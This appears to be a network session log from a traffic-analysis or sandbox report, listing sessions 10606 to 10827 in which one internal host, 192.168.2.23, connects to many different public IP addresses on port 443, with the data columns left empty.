                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10606192.168.2.2339878220.164.34.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10607192.168.2.2335258121.101.6.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10608192.168.2.2355456188.219.204.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10609192.168.2.233528295.188.95.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10610192.168.2.234482012.120.114.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10611192.168.2.2353908181.87.177.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10612192.168.2.235507263.177.76.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10613192.168.2.235295858.107.116.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10614192.168.2.233401644.54.142.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10615192.168.2.2337742193.165.9.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10616192.168.2.234491481.1.93.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10617192.168.2.234474657.87.187.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10618192.168.2.2338268139.76.188.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10619192.168.2.2346652114.198.1.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10620192.168.2.235141874.222.112.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10621192.168.2.233647447.191.235.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10622192.168.2.236083268.83.37.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10623192.168.2.234532654.46.68.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10624192.168.2.2340268111.208.179.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10625192.168.2.2350124138.200.215.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10626192.168.2.233595443.48.1.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10627192.168.2.2359846197.3.193.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10628192.168.2.234598052.115.164.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10629192.168.2.2359646135.239.34.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10630192.168.2.235178062.71.111.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10631192.168.2.233504246.165.208.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10632192.168.2.233885257.37.129.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10633192.168.2.2350838140.94.29.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10634192.168.2.2354948181.221.170.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10635192.168.2.2342856139.25.155.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10636192.168.2.235574293.221.152.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10637192.168.2.233445864.128.60.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10638192.168.2.234924079.242.193.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10639192.168.2.2352694200.243.118.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10640192.168.2.234294674.3.106.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10641192.168.2.2357916120.12.16.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10642192.168.2.235895492.24.134.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10643192.168.2.23349184.55.137.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10644192.168.2.2354816181.157.59.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10645192.168.2.2356554114.25.131.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10646192.168.2.2339858122.57.130.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10647192.168.2.234747634.94.137.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10648192.168.2.23505965.47.231.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10649192.168.2.2347436207.251.74.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10650192.168.2.233738281.243.121.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10651192.168.2.2334080193.224.222.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10652192.168.2.2335730176.138.179.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10653192.168.2.234559845.42.65.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10654192.168.2.2354054167.134.183.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10655192.168.2.2335722133.237.11.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10656192.168.2.234469635.219.212.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10657192.168.2.23462684.87.193.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10658192.168.2.2352936141.142.195.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10659192.168.2.2348282151.230.222.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10660192.168.2.235516261.161.148.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10661192.168.2.235524271.64.198.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10662192.168.2.2346872101.62.56.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10663192.168.2.234942846.75.135.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10664192.168.2.2353022200.54.34.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10665192.168.2.2345712186.35.14.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10666192.168.2.2354020172.97.105.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10667192.168.2.234406268.90.104.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10668192.168.2.2342358113.92.117.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10669192.168.2.2341574195.120.13.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10670192.168.2.235171461.247.92.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10671192.168.2.2341760148.56.215.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10672192.168.2.235480283.153.19.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10673192.168.2.2360156192.132.116.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10674192.168.2.23471969.161.194.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10675192.168.2.233377436.168.63.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10676192.168.2.23505984.105.153.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10677192.168.2.233974439.142.73.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10678192.168.2.2359944156.240.148.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10679192.168.2.2358456166.59.74.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10680192.168.2.2336526194.187.227.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10681192.168.2.2346540124.54.13.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10682192.168.2.2350628182.152.252.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10683192.168.2.2354714198.147.152.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10684192.168.2.2342024104.76.126.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10685192.168.2.2360092120.146.240.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10686192.168.2.2353764126.163.164.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10687192.168.2.23402809.253.61.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10688192.168.2.2338388195.161.215.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10689192.168.2.234902679.35.216.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10690192.168.2.235407617.131.3.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10691192.168.2.2351702101.195.84.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10692192.168.2.2347788216.138.32.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10693192.168.2.2347766189.191.33.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10694192.168.2.235129080.255.45.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10695192.168.2.2342428223.188.230.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10696192.168.2.234076890.235.14.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10697192.168.2.235174688.163.131.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10698192.168.2.235700860.99.252.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10699192.168.2.2354834126.132.91.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10700192.168.2.234267887.171.95.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10701192.168.2.233915668.252.91.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10702192.168.2.2360910101.189.132.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10703192.168.2.2345574207.175.211.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10704192.168.2.234104298.103.72.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10705192.168.2.2346950121.14.131.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10706192.168.2.2340302166.137.191.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10707192.168.2.2354880109.235.243.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10708192.168.2.2344264125.139.40.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10709192.168.2.2350728110.82.45.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10710192.168.2.2345604107.167.80.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10711192.168.2.2350562128.105.230.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10712192.168.2.233993666.32.240.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10713192.168.2.233897857.46.96.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10714192.168.2.2347794167.133.204.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10715192.168.2.233576698.169.59.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10716192.168.2.2338048156.99.157.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10717192.168.2.2345270200.172.83.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10718192.168.2.2346398212.121.199.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10719192.168.2.2333836179.6.154.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10720192.168.2.233363019.26.95.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10721192.168.2.235893014.30.239.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10722192.168.2.2343796156.248.207.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10723192.168.2.2344638148.125.123.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10724192.168.2.234917675.116.222.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10725192.168.2.2355308151.116.125.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10726192.168.2.2357648114.147.170.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10727192.168.2.2359540106.184.83.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10728192.168.2.2355708185.58.66.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10729192.168.2.234350440.200.19.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10730192.168.2.2347718113.109.191.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10731192.168.2.2351180128.119.196.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10732192.168.2.2347956164.163.122.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10733192.168.2.2342622152.167.136.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10734192.168.2.2338012118.15.43.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10735192.168.2.2337238198.114.254.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10736192.168.2.2347554108.52.211.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10737192.168.2.233705061.33.110.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10738192.168.2.2353540144.156.162.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10739192.168.2.233840266.115.164.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10740192.168.2.234157024.141.105.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10741192.168.2.2353556128.144.152.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10742192.168.2.235677867.30.194.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10743192.168.2.233457852.101.77.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10744192.168.2.2342614217.44.39.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10745192.168.2.233829627.214.184.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10746192.168.2.234050435.117.99.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10747192.168.2.233451063.188.69.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10748192.168.2.2343518177.139.55.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10749192.168.2.235391017.77.229.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10750192.168.2.233959075.222.165.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10751192.168.2.2337552199.62.111.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10752192.168.2.234889891.205.227.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10753192.168.2.2335586147.169.147.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10754192.168.2.2338972211.82.114.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10755192.168.2.2345928211.115.159.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10756192.168.2.233299242.0.90.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10757192.168.2.233534439.82.169.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10758192.168.2.234852239.225.212.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10759192.168.2.2346522124.192.172.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10760192.168.2.2342282124.8.21.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10761192.168.2.234305264.111.63.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10762192.168.2.235706072.87.106.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10763192.168.2.2358846167.41.109.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10764192.168.2.2350374103.196.121.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10765192.168.2.2350760113.61.92.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10766192.168.2.234585875.254.129.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10767192.168.2.235147446.23.72.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10768192.168.2.234600677.26.133.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10769192.168.2.233385269.184.65.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10770192.168.2.2344956114.85.8.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10771192.168.2.233297298.38.192.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10772192.168.2.2340100193.240.119.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10773192.168.2.235651060.222.128.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10774192.168.2.234993627.93.159.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10775192.168.2.2354324204.83.105.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10776192.168.2.2355514182.130.18.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10777192.168.2.2335578178.251.62.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10778192.168.2.2335056137.82.86.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10779192.168.2.2351306209.160.251.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10780192.168.2.234953069.108.214.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10781192.168.2.2357886177.37.33.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10782192.168.2.2340024205.22.142.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10783192.168.2.234299840.218.140.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10784192.168.2.2349620157.94.24.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10785192.168.2.234867658.94.63.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10786192.168.2.233443252.48.113.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10787192.168.2.233283850.233.6.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10788192.168.2.235225227.68.165.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10789192.168.2.2334452183.50.243.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10790192.168.2.2344288181.1.147.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10791192.168.2.236002639.108.5.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10792192.168.2.2333978151.117.46.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10793192.168.2.233975844.114.188.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10794192.168.2.2357900128.54.65.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10795192.168.2.233462849.52.165.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10796192.168.2.234776459.46.198.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10797192.168.2.2343190133.133.252.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10798192.168.2.235453044.77.71.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10799192.168.2.234509291.132.192.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10800192.168.2.2341354130.50.35.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10801192.168.2.235749827.65.72.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10802192.168.2.234666839.9.130.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10803192.168.2.234325617.160.43.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10804192.168.2.2335040163.143.10.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10805192.168.2.234646665.223.168.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10806192.168.2.2337524177.33.120.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10807192.168.2.233498264.169.180.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10808192.168.2.2359810161.147.179.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10809192.168.2.233364472.29.109.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10810192.168.2.2351282106.228.149.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10811192.168.2.2351064145.62.237.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10812192.168.2.2338798156.221.67.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10813192.168.2.235641482.109.132.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10814192.168.2.2342768147.255.138.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10815192.168.2.23506148.179.66.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10816192.168.2.235379850.47.131.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10817192.168.2.235757287.59.245.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10818192.168.2.2339998141.169.95.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10819192.168.2.2346044157.75.135.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10820192.168.2.234023067.203.53.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10821192.168.2.233645825.209.194.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10822192.168.2.235977445.182.54.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10823192.168.2.234313469.195.23.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10824192.168.2.2341780210.11.248.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10825192.168.2.234665899.162.133.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10826192.168.2.23363229.151.229.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10827192.168.2.2336232201.136.96.193443
                                                TimestampBytes transferredDirectionData


